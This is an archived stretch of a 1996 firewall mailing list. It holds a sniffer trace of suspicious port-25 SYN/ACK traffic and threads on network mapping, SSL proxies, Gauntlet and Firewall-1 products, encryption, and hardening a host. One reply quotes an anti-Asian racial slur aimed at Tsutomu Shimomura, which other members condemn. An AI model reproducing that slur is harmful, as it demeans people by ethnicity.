advisories about sniffer attacks. To those who already asked me for sniffer code or how to set up sniffers: I am a righteous dawg appointed by Gwad and the Church of the Dead Meow to sniff and learn. Gwad didn't tell me to teach young crimmo's so I simply delete your mail. Others: Please don't tell me these guys are trying to just send mail. They just happened to be hitting port 25 at that time. - - - - - - - - - - - - - Frame 1454 - - - - - - - - - - - - - - SUMMARY Delta T NW Util From . From . 1454 0.2823 0.13% 3Com 7468BE Cisco 0A4C91 DLC Ethertype=0800, size=60 bytes IP D=[xxx.xxx.xxx.xxx] S=[203.241.159.180] LEN=24 ID=62335 TCP D=4126 S=25 SYN ACK=2872491522 SEQ=935105536 LEN=0 WIN=9216 DLC: ----- DLC Header ----- DLC: Frame 1454 arrived at 10:39:40.8363; frame size is 60 (003C hex) bytes. DLC: Destination = Station 3Com 7468BE DLC: Source = Station Cisco 0A4C91 DLC: Ethertype = 0800 (IP) IP: ----- IP Header ----- IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 44 bytes IP: Identification = 62335 IP: Flags = 4X IP: .1.. .... = don't fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 237 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = D104 (correct) IP: Source address = [203.241.159.180], Unknown_d00d IP: Destination address = [xxx.xxx.xxx.xxx], Clueless IP: No options TCP: ----- TCP header ----- TCP: Source port = 25 (SMTP) TCP: Destination port = 4126 TCP: Initial sequence number = 935105536 TCP: Acknowledgment number = 2872491522 TCP: Data offset = 24 bytes TCP: Flags = 12 TCP: ..0. .... = (No urgent pointer) TCP: ...1 .... = Acknowledgment TCP: .... 0... = (No push) TCP: .... .0.. = (No reset) TCP: .... ..1. = SYN TCP: .... ...0 = (No FIN) TCP: Window = 9216 TCP: Checksum = 6956 (correct) TCP: Options follow TCP: Maximum segment size = 512 - - - - - - - - - - - - - Frame 1455 - - - - - - - - - - - - - - SUMMARY Delta T NW Util From . From . 1455 0.0004 0.13% Cisco 0A4C91 3Com 7468BE DLC Ethertype=0800, size=60 bytes IP D=[203.241.159.180] S=[xxx.xxx.xxx.xxx] LEN=20 ID=4051 TCP D=25 S=4126 RST WIN=0 DLC: ----- DLC Header ----- DLC: Frame 1455 arrived at 10:39:40.8368; frame size is 60 (003C hex) bytes. DLC: Destination = Station Cisco 0A4C91 DLC: Source = Station 3Com 7468BE DLC: Ethertype = 0800 (IP) IP: ----- IP Header ----- IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 40 bytes IP: Identification = 4051 IP: Flags = 0X IP: .0.. .... = may fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 60 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = A5B6 (correct) IP: Source address = [xxx.xxx.xxx.xxx], Clueless IP: Destination address = [203.241.159.180], Unknown_d00d IP: No options TCP: ----- TCP header ----- TCP: Source port = 4126 TCP: Destination port = 25 (SMTP) TCP: Sequence number = 2872491522 TCP: Data offset = 20 bytes TCP: Flags = 04 TCP: ..0. .... = (No urgent pointer) TCP: ...0 .... = (No acknowledgment) TCP: .... 0... = (No push) TCP: .... .1.. = Reset TCP: .... ..0. = (No SYN) TCP: .... ...0 = (No FIN) TCP: Window = 0 TCP: Checksum = 6D29 (correct) TCP: No TCP options - - - - - - - - - - - - - Frame 1493 - - - - - - - - - - - - - - SUMMARY Delta T NW Util From . From . 1493 0.2622 0.13% 3Com 7468BE Cisco 0A4C91 DLC Ethertype=0800, size=60 bytes IP D=[xxx.xxx.xxx.xxx] S=[203.241.159.180] LEN=24 ID=62336 TCP D=4126 S=25 SYN ACK=2872491522 SEQ=935809536 LEN=0 WIN=9216 DLC: ----- DLC Header ----- DLC: Frame 1493 arrived at 10:39:46.3716; frame size is 60 (003C hex) bytes. DLC: Destination = Station 3Com 7468BE DLC: Source = Station Cisco 0A4C91 DLC: Ethertype = 0800 (IP) IP: ----- IP Header ----- IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 44 bytes IP: Identification = 62336 IP: Flags = 4X IP: .1.. .... = don't fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 237 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = D103 (correct) IP: Source address = [203.241.159.180], Unknown_d00d IP: Destination address = [xxx.xxx.xxx.xxx], Clueless IP: No options TCP: ----- TCP header ----- TCP: Source port = 25 (SMTP) TCP: Destination port = 4126 TCP: Initial sequence number = 935809536 TCP: Acknowledgment number = 2872491522 TCP: Data offset = 24 bytes TCP: Flags = 12 TCP: ..0. .... = (No urgent pointer) TCP: ...1 .... = Acknowledgment TCP: .... 0... = (No push) TCP: .... .0.. = (No reset) TCP: .... ..1. = SYN TCP: .... ...0 = (No FIN) TCP: Window = 9216 TCP: Checksum = AB4B (correct) TCP: Options follow TCP: Maximum segment size = 512 - - - - - - - - - - - - - Frame 1494 - - - - - - - - - - - - - - SUMMARY Delta T NW Util From . From . 1494 0.0004 0.13% Cisco 0A4C91 3Com 7468BE DLC Ethertype=0800, size=60 bytes IP D=[203.241.159.180] S=[xxx.xxx.xxx.xxx] LEN=20 ID=4072 TCP D=25 S=4126 RST WIN=0 DLC: ----- DLC Header ----- DLC: Frame 1494 arrived at 10:39:46.3720; frame size is 60 (003C hex) bytes. DLC: Destination = Station Cisco 0A4C91 DLC: Source = Station 3Com 7468BE DLC: Ethertype = 0800 (IP) IP: ----- IP Header ----- IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 40 bytes IP: Identification = 4072 IP: Flags = 0X IP: .0.. .... = may fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 60 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = A5A1 (correct) IP: Source address = [xxx.xxx.xxx.xxx], Clueless IP: Destination address = [203.241.159.180], Unknown_d00d IP: No options TCP: ----- TCP header ----- TCP: Source port = 4126 TCP: Destination port = 25 (SMTP) TCP: Sequence number = 2872491522 TCP: Data offset = 20 bytes TCP: Flags = 04 TCP: ..0. .... = (No urgent pointer) TCP: ...0 .... = (No acknowledgment) TCP: .... 0... = (No push) TCP: .... .1.. = Reset TCP: .... ..0. = (No SYN) TCP: .... ...0 = (No FIN) TCP: Window = 0 TCP: Checksum = 6D29 (correct) TCP: No TCP options - - - - - - - - - - - - - Frame 1517 - - - - - - - - - - - - - - SUMMARY Delta T NW Util From . From . 1517 0.0421 0.24% 3Com 7468BE Cisco 0A4C91 DLC Ethertype=0800, size=60 bytes IP D=[xxx.xxx.xxx.xxx] S=[203.241.159.180] LEN=24 ID=62337 TCP D=4126 S=25 SYN ACK=2872491522 SEQ=939073536 LEN=0 WIN=9216 DLC: ----- DLC Header ----- DLC: Frame 1517 arrived at 10:40:10.3717; frame size is 60 (003C hex) bytes. DLC: Destination = Station 3Com 7468BE DLC: Source = Station Cisco 0A4C91 DLC: Ethertype = 0800 (IP) IP: ----- IP Header ----- IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 44 bytes IP: Identification = 62337 IP: Flags = 4X IP: .1.. .... = don't fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 237 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = D102 (correct) IP: Source address = [203.241.159.180], Unknown_d00d IP: Destination address = [xxx.xxx.xxx.xxx], Clueless IP: No options TCP: ----- TCP header ----- TCP: Source port = 25 (SMTP) TCP: Destination port = 4126 TCP: Initial sequence number = 939073536 TCP: Acknowledgment number = 2872491522 TCP: Data offset = 24 bytes TCP: Flags = 12 TCP: ..0. .... = (No urgent pointer) TCP: ...1 .... = Acknowledgment TCP: .... 0... = (No push) TCP: .... .0.. = (No reset) TCP: .... ..1. = SYN TCP: .... ...0 = (No FIN) TCP: Window = 9216 TCP: Checksum = DD19 (correct) TCP: TCP: Options follow TCP: Maximum segment size = 512 TCP: - - - - - - - - - - - - - Frame 1518 - - - - - - - - - - - - - - SUMMARY Delta T NW Util From . From . 1518 0.0004 0.24% Cisco 0A4C91 3Com 7468BE DLC Ethertype=0800, size=60 bytes IP D=[203.241.159.180] S=[xxx.xxx.xxx.xxx] LEN=20 ID=4102 TCP D=25 S=4126 RST WIN=0 DLC: ----- DLC Header ----- DLC: Frame 1518 arrived at 10:40:10.3721; frame size is 60 (003C hex) bytes. DLC: Destination = Station Cisco 0A4C91 DLC: Source = Station 3Com 7468BE DLC: Ethertype = 0800 (IP) IP: ----- IP Header ----- IP: Version = 4, header length = 20 bytes IP: Type of service = 00 IP: 000. .... = routine IP: ...0 .... = normal delay IP: .... 0... = normal throughput IP: .... .0.. = normal reliability IP: Total length = 40 bytes IP: Identification = 4102 IP: Flags = 0X IP: .0.. .... = may fragment IP: ..0. .... = last fragment IP: Fragment offset = 0 bytes IP: Time to live = 60 seconds/hops IP: Protocol = 6 (TCP) IP: Header checksum = A583 (correct) IP: Source address = [xxx.xxx.xxx.xxx], Clueless IP: Destination address = [203.241.159.180], Unknown_d00d IP: No options TCP: ----- TCP header ----- TCP: Source port = 4126 TCP: Destination port = 25 (SMTP) TCP: Sequence number = 2872491522 TCP: Data offset = 20 bytes TCP: Flags = 04 TCP: ..0. .... = (No urgent pointer) TCP: ...0 .... = (No acknowledgment) TCP: .... 0... = (No push) TCP: .... .1.. = Reset TCP: .... ..0. = (No SYN) TCP: .... ...0 = (No FIN) TCP: Window = 0 TCP: Checksum = 6D29 (correct) TCP: No TCP options From firewalls-owner Mon Feb 12 13:41:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28639 for firewalls-outgoing; Mon, 12 Feb 1996 12:59:30 -0800 (PST) Received: from guardian.EnGarde.com (guardian.EnGarde.com [199.165.219.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA28627 for ; Mon, 12 Feb 1996 12:59:25 -0800 (PST) Received: (from mcn@localhost) by guardian.EnGarde.com (8.7.3/8.6.12) id OAA27620; Mon, 12 Feb 1996 14:56:38 -0600 (CST) Date: Mon, 12 Feb 1996 14:56:38 -0600 (CST) From: Mike Neuman Message-Id: <199602122056.OAA27620@guardian.EnGarde.com> To: sikpuppy@maestro.com, firewalls@greatcircle.com Subject: Re: tkined and firewalls Reply-To: mcn@EnGarde.com Organization: En Garde Systems--St. Louis, MO Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article you write: >I know the firewall companies have techies lurking on this list even >though they never post (my hind brain's intuition). > >What is the chance of tkined being able to produce a graphical map of a >network through a firewall? > >Come on techies, delurk and edificate us what is less illuminary. This isn't that hard of a question to answer. tkined searches for hosts by using ICMP echo requests. If you're allowing ICMP through the firewall, then it'll come up with a map, simple as that. Some of tkined's nicer mapping abilities depend upon whether you're allowing other types of ICMP packets through or are running SNMP. -Mike mcn@EnGarde.com From firewalls-owner Mon Feb 12 13:43:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01737 for firewalls-outgoing; Mon, 12 Feb 1996 13:30:36 -0800 (PST) Received: from info.forthnet.gr (info.forthnet.gr [139.91.1.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01732 for ; Mon, 12 Feb 1996 13:30:31 -0800 (PST) Received: from vicky.forthnet.gr by info.forthnet.gr via FORTHnet with SMTP; id XAA16753 (8.6.12/FORTHNET-2.0); Mon, 12 Feb 1996 23:26:21 +0200 (EET DST) Message-Id: <199602122126.XAA16753@info.forthnet.gr> Organization: Reply-to: kermit@soscorp.com To: Shoel Perelman cc: "'firewalls@greatcircle.com'" Subject: Re: SHTTP/SSL Proxies? In-reply-to: Your message of "Mon, 12 Feb 1996 14:40:35 EST." <01BAF958.19AB3980@SPERFNET.cscmicro.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <15766.824160378.1@forthnet.gr> Date: Mon, 12 Feb 1996 23:26:19 +0200 From: "Angelos D. Keromytis" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <01BAF958.19AB3980@SPERFNET.cscmicro.com>, Shoel Perelman writes: >I have been using FWTK to proxy http, but now I realize that users want = >to access shttp pages. Are there any "free" solutions like fwtk to do = >this? I tried using plug-gw from fwtk to do this on port 443, but it = >doesn't see to work. Has anybody successfully configured a shttp proxy? = > If so, what package did you use? A "net" or "free" solution is what = >I'm really looking for here... > Are you refering to SHTTP or SSL (HTTPS) pages ? We (SOS Corporation) are in the final stages of testing of a product that does proxy-SSL on behalf of clients that don't talk SSL natively; if your browsers DO talk SSL (like Netscape Navigator), you can always use the CERN httpd with the SSL-proxy patch by Ari Luotonen which allows your browsers to talk SSL with the remote servers directly. SHTTP is another matter altogether; there are plans to add support for it to the proxy WWW server, but not in the very near future. Regards, -Angelos SOS Corporation From firewalls-owner Mon Feb 12 13:45:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01146 for firewalls-outgoing; Mon, 12 Feb 1996 13:15:29 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA00894 for ; Mon, 12 Feb 1996 13:14:44 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA08413; Mon, 12 Feb 96 15:16:52 CST Received: by mnbp.network.com with Microsoft Mail id <311FAD16@mnbp.network.com>; Mon, 12 Feb 96 15:11:50 CST From: Michael Brown To: firewalllist Subject: Dead End Concepts-Encryption Date: Mon, 12 Feb 96 15:10:00 CST Message-Id: <311FAD16@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Further corporations and big users do not need to encrypt individual files > for the most part, they need to encrypt channels (to avoid volume analysis) > between their sites and the entire notebook/computer, not some files. Heck, > corporate users have trouble understanding when to run and not to run > macros in WORD documents and you expect them to be dilligent about what > files to encrypt before mailing ? > > Just as we had to move protection from the workstation/node level to the > network/subnet (e.g. firewalls), transaction protection must also be moved. > I am seeing a lot of whole keys on blue backgrounds these days... > > Warmly, > Padgett If you can convince Users to encrypt files, you are pretty good salestype. But they do not continue to follow by the rules. They start slacking and then get pissed becasue"it takes too long", and "do we really need to do this". If you need to keep things safe, you have to address it at the network level. Encrypt everything or set rules to auto encrypt over the Frame Relay nets, internet, any public telco based network. And if you're serious about security stay away from that 40 bit junk. Go above DES too. Go to TripleDES(112 bit) or IDEA(128bit).This is the good stuff regulated by UnkEL Sam. mkb From firewalls-owner Mon Feb 12 14:24:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04343 for firewalls-outgoing; Mon, 12 Feb 1996 14:22:10 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04309 for ; Mon, 12 Feb 1996 14:21:54 -0800 (PST) Received: by gauntlet-1.trusted.com; id RAA21837; Mon, 12 Feb 1996 17:28:29 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma021817; Mon, 12 Feb 96 17:28:09 -0500 Received: from vanidor.trusted.com by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA00900; Mon, 12 Feb 96 17:19:50 -0500 Message-Id: <2.2.16.19960212221655.4d1f5028@pop.trusted.com> X-Sender: avolio@pop.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 17:16:55 -0500 To: sengle@hti.net (Steven W. Engle), firewalls@GreatCircle.COM From: Frederick M Avolio Subject: Re: Gauntlet 3.1 Packet Filter? Cc: sengle@hti.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:00 PM 2/12/96 -0600, Steven W. Engle wrote: >Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny >source / destination)? Or it is purely a application level proxy services >approach? It is an application gateway, as you suggest, and purely that, but it does uses rules based on many things including source and destination. >If I have IP traffic for which there is no proxy for, how can I control >this traffic without writing a custom proxy? The quick answer people will give is to use the Plug Gateway, but I'd rather you thought about the service a bit first and decided that it was secure to allow through a firewall. Writing customer proxies may be very easy or difficult. It depends on the protocol and how well-defined it is (mostly). Using other proxies as the basis for this sometimes makes this easier to do. (Source code is provided.) > >If it does packet-filter, how (well) are the proxy "rules" integrated with >the packet-filtering "rules"? > >I checked out the TIS web sight and could not find any specific statments >toward "yes, it packet filters". No, it does not packet filter. I'm hoping you looked at the functional summary there. You can find it at http://www.tis.com/docs/Products/g31fdh.html Fred > >-- >Steve Engle >DHT, Inc. >sengle@hti.net > > > From firewalls-owner Mon Feb 12 14:39:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04533 for firewalls-outgoing; Mon, 12 Feb 1996 14:24:02 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04513 for ; Mon, 12 Feb 1996 14:23:53 -0800 (PST) Received: by gauntlet-1.trusted.com; id RAA21879; Mon, 12 Feb 1996 17:30:29 -0500 Received: from hilo.trusted.com(10.0.1.126) by gauntlet-1.trusted.com via smap (V3.1) id xma021873; Mon, 12 Feb 96 17:30:07 -0500 Received: from vanidor.trusted.com by hilo.trusted.com with SMTP (1.37.109.4/16.2) id AA00930; Mon, 12 Feb 96 17:21:48 -0500 Message-Id: <2.2.16.19960212221853.13d714ca@pop.trusted.com> X-Sender: avolio@pop.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 12 Feb 1996 17:18:53 -0500 To: Shoel Perelman , "'firewalls@greatcircle.com'" From: Frederick M Avolio Subject: Re: SHTTP/SSL Proxies? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recommend asking on the FWTK mailing list for this. Plug works, and there will be other options in the next release, being discussed there. Fred At 02:40 PM 2/12/96 -0500, Shoel Perelman wrote: >I have been using FWTK to proxy http, but now I realize that users want to access shttp pages. Are there any "free" solutions like fwtk to do this? I tried using plug-gw from fwtk to do this on port 443, but it doesn't see to work. Has anybody successfully configured a shttp proxy? If so, what package did you use? A "net" or "free" solution is what I'm really looking for here... > >Thanks in advance.. > >-Shoel Perelman >sdp4198@is2.nyu.edu > > From firewalls-owner Mon Feb 12 14:54:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04971 for firewalls-outgoing; Mon, 12 Feb 1996 14:33:58 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.235.78]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04966 for ; Mon, 12 Feb 1996 14:33:54 -0800 (PST) Received: (karyn@localhost) by diablo.cisco.com (8.6.10/CISCO.SERVER.1.1) id OAA14492 for firewalls@greatcircle.com; Mon, 12 Feb 1996 14:33:46 -0800 From: Karyn Pichnarczyk Message-Id: <199602122233.OAA14492@diablo.cisco.com> Subject: the Brosl Hasslacher thing To: firewalls@greatcircle.com Date: Mon, 12 Feb 1996 14:33:46 -0800 (PST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Want to see what was done? check out: http://takedown.com/evidence/anklebiters/ Let's get back to firewalls stuff. karyn From firewalls-owner Mon Feb 12 15:24:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05248 for firewalls-outgoing; Mon, 12 Feb 1996 14:41:06 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05220 for ; Mon, 12 Feb 1996 14:40:34 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA09953; Mon, 12 Feb 96 16:42:06 CST Received: by mnbp.network.com with Microsoft Mail id <311FC110@mnbp.network.com>; Mon, 12 Feb 96 16:37:04 CST From: Michael Brown To: firewalllist , steveengle Subject: RE: Gauntlet 3.1 Packet Filter? Date: Mon, 12 Feb 96 16:36:00 CST Message-Id: <311FC110@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You're looking for the NSC equipment, i.e. BorderGuard. check out www.network.com and look at security stuff. _____________________________________________________ Subject: Gauntlet 3.1 Packet Filter? Date: Monday, February 12, 1996 2:00PM Does Gauntlet 3.1 packet filter in the conventional sense (permit / deny source / destination)? Or it is purely a application level proxy services approach? If I have IP traffic for which there is no proxy for, how can I control this traffic without writing a custom proxy? If it does packet-filter, how (well) are the proxy "rules" integrated with the packet-filtering "rules"? I checked out the TIS web sight and could not find any specific statments toward "yes, it packet filters". -- Steve Engle DHT, Inc. sengle@hti.net From firewalls-owner Mon Feb 12 15:46:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA07234 for firewalls-outgoing; Mon, 12 Feb 1996 15:22:35 -0800 (PST) Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA07223 for ; Mon, 12 Feb 1996 15:22:27 -0800 (PST) Message-ID: <9602121821.AA14495@databus.databus.com> Date: Mon, 12 Feb 96 18:21 EST From: Barney Wolff To: firewalls@GreatCircle.com Subject: Re: Hoo Dat and sniffer log Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: Sun, 11 Feb 1996 14:10:49 -0500 (EST) >From: Sick Puppy > >Others: Please don't tell me these guys are trying to just send >mail. They just happened to be hitting port 25 at that time. Looks to me as though 203.241.159.180 (which is something in Samsung) thinks *you're* trying to send mail. Perhaps somebody sent them a tcp.syn with your (spoofed) IP address. In any case, your resets are not getting to them, so they re-transmit their syn/ack. Traceroute works from me to that address, so why aren't your resets getting through? What's arcane about sniffing with a real Sniffer(tm)? Barney Wolff From firewalls-owner Mon Feb 12 15:54:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA07218 for firewalls-outgoing; Mon, 12 Feb 1996 15:22:21 -0800 (PST) Received: from perki.connect.com.au (perki.connect.com.au [192.189.54.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA07201 for ; Mon, 12 Feb 1996 15:21:49 -0800 (PST) Received: (from Utronic@localhost) by perki.connect.com.au id KAA25628 (8.6.12/IDA-1.6 for firewalls@GreatCircle.COM); Tue, 13 Feb 1996 10:20:34 +1100 >Received: from mecx05. colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA28218; Tue, 13 Feb 96 09:05:45 EST Received: from cnw06 by perki; Tue, 13 Feb 1996 10:20 EST Received: from mecx05. colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA28218; Tue, 13 Feb 96 09:05:45 EST Received: from meei91 (meei97) by mecx05. colesmyer.com.au (5.0/SMI-4.1) id AA14669; Tue, 13 Feb 1996 08:45:52 +1100 Message-Id: <311FC6D9.1601@mecx05.colesmyer.com.au> Date: Tue, 13 Feb 1996 09:01:45 +1000 From: Graham Jose Organization: Coles Myer Limited X-Mailer: Mozilla 2.0b6a (WinNT; I) Mime-Version: 1.0 To: "firewalls@GreatCircle.COM" Subject: Firewall-1 Version Comparison Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody had experience with both version 1 and 2 of the Firewall-1 software? I am interested in a functional comparison of the versions, and also in knowing whether there are other corporate sites currently using version 2. Thanks, Graham -- Graham Jose, Technical Analyst, Information Systems Security Retail Technology Services, Coles Myer Limited (Australia) Voice: +613 9483 7613 Email: gjose@mecx05.colesmyer.com.au From firewalls-owner Mon Feb 12 16:54:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11349 for firewalls-outgoing; Mon, 12 Feb 1996 16:48:41 -0800 (PST) Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA11335 for ; Mon, 12 Feb 1996 16:48:05 -0800 (PST) Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA14201 (5.67a/IDA-1.5 for ); Tue, 13 Feb 1996 08:47:38 +0800 Received: by bass.bass.com.my (4.1/SMI-4.1) id AA06654; Tue, 13 Feb 96 08:42:42 MYT Date: Tue, 13 Feb 1996 08:42:19 +0800 (MYT) From: Tham Huei Hwan To: firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Mon Feb 12 19:54:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA17722 for firewalls-outgoing; Mon, 12 Feb 1996 19:52:41 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA17717 for ; Mon, 12 Feb 1996 19:52:36 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id WAA22724; Mon, 12 Feb 1996 22:48:52 -0500 Date: Mon, 12 Feb 1996 22:48:47 -0500 (EST) From: Rabid Wombat To: Oliver Friedrichs cc: Kent Dahlgren , Brosl Hasslacher , firewalls@GreatCircle.COM Subject: Re: your mail In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yeah, but I'm sure the little prick is lurkin' on the list on some stolen account, so he'll see it anyway. From what I heard, the Brosl account is on a "jail" system, so Brosl may or may not be a real person - my apologies to Brosol if sie is. ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Mon, 12 Feb 1996, Oliver Friedrichs wrote: > > You realize this was posted from a hacked account right ? > > > On Mon, 12 Feb 1996, Kent Dahlgren wrote: > > > > > On Sat, 10 Feb 1996, Brosl Hasslacher wrote: > > > > > It seems that once again, that slanty-eyed chink Tsutomu has made another > > > dollar at the expense of a hacker, Kevin Mitnick. > > > > > > > "Slanty eyed chink?" Jeez, that's a lame call. Your credibility goes > > down the sewer....at least in my eyes. And I'm a good ol white boy from > > the Pacific Northwest. Lame lame lame lame..... > > > > > > "Any ideas expressed here may not reflect those of my employers" > > ______________________________________________________________________________ > > ______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______ > > / > > Voice: 1.800.835.6100 E-mail: support@colorprinters.tek.com > > Fax: 1.503.685.3063 WWW: www.tek.com > > BBS: 1.503.685.4504 E-World: Keyword Tektronix > > HAL: 1.503.682.7450 AOL: Keyword Tektronix > > Service: 1.800.835.6100 FTP: ftp.tek.com > > ______________________________________________________________________________ > > > > > From firewalls-owner Mon Feb 12 23:24:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA25217 for firewalls-outgoing; Mon, 12 Feb 1996 23:11:04 -0800 (PST) Received: from sol.acs.uwosh.edu (sol.acs.uwosh.edu [141.233.159.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA25211 for ; Mon, 12 Feb 1996 23:11:00 -0800 (PST) Received: by sol.acs.uwosh.edu; id AA02177; 4.1/42.1.5; Tue, 13 Feb 96 01:08:28 CST Received: from afya.acs.uwosh.edu(141.233.159.3) by sol.acs.uwosh.edu via smap (V1.3) id sma002173; Tue Feb 13 01:08:09 1996 Received: by afya.acs.uwosh.edu (4.1) id AA22999; Tue, 13 Feb 96 01:08:05 CST Message-Id: <9602130708.AA22999@afya.acs.uwosh.edu> To: firewalls@greatcircle.com Subject: Isolated box... Date: Tue, 13 Feb 1996 01:08:04 -0600 From: "Brian T. Wightman" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, This may not be entirely relevant for firewalls, but I think it is close, so... I have an opportunity to get a couple of old Sun IPCs to use to provide services such as RARP, bootp/dhcp, bootparams, etc as well as some network listening. RARP under SunOS 4.1.n needs the /dev/nit device, which I do not want to put on an "open" machine. Would stripping all services from /etc/inetd, stopping nfs, NIS, etc, basically only allowing console logins, and only supporting sendmail going out, ftp going out, pulling unneeded devices/filesystem types/etc out of the kernel, etc be sufficient protection for this box, or are there some other parameters that would need to be tweaked either in the kernel at run time or in some header files? Basically I would like to lock that /dev/nit device into a controled environment. It would be a pain in the but to administer, but it should not require much in the way of maintenance. Brian T. Wightman wightman@sol.acs.uwosh.edu Academic Computing, UW Oshkosh wightman@oshkoshw.bitnet 800 Algoma Blvd, Dempsey Hall 307 http://www.uwosh.edu/faculty_staff/wightman Oshkosh, Wisconsin 54901 Phone: (414) 424-3020 From 